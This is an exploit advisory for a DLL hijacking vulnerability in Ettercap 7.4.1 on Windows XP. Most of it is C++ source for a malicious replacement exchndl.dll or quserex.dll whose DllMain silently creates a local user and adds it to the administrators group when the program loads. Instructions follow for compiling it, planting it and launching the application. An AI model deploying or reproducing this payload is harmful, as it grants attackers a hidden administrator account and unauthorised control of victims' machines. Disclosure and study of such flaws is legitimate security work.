Exploit Title: ettercap 7.4.1 Dll hijacking vulnerability (exchndl.dll
- quserex.dll)
Date: Tuesday April 24
Author: nimaarek
Vendor or Software Link: http://ettercap.sourceforge.net
Version: 7.4.1
Tested on: Windows XP SP3
.__ __
____ |__| _____ _____ _____ _______ ____ | | __
/ \| |/ \\__ \ \__ \\_ __ \_/ __ \| |/ /
| | \ | Y Y \/ __ \_/ __ \| | \/\ ___/| <
|___| /__|__|_| (____ (____ /__| \___ >__|_ \
\/ \/ \/ \/ \/ \/
/*
Application Information:
Application: Ettercap.exe
Version: NG-7.4.1
Company Name: The EtterCap community, http://ettercap.sourceforge.net/
File Date: Tuesday April 24
Description: EtterCap sniffer
Operating System: Windows XP SP3
Total Extensions Verified: 2
Verified Extensions: htm;html;
=============================================================
//tested on Windows XP SP3
#include "stdafx.h"
#include "windows.h"
#include <cstdlib>
int main()
{
system("net user apuser appass /add");
system("net localgroup administrators apuser /add");
exit(0);
return 0;
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
main();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
=============================================================
Instructions:
1. Compile dll
2. Replace exchndl.dll Or quserex.dll in Ettercap directory with your
newly compiled dll
3. Launch Ettercap
4. Bo0o0o0o0o0o0o0m !
Greet to my Lovely friends :
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+
|M|O|H|3|N|C|O|D|E|r| |a|n|d| |A|m|i|r| |N|e|m|a|t|i|
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+
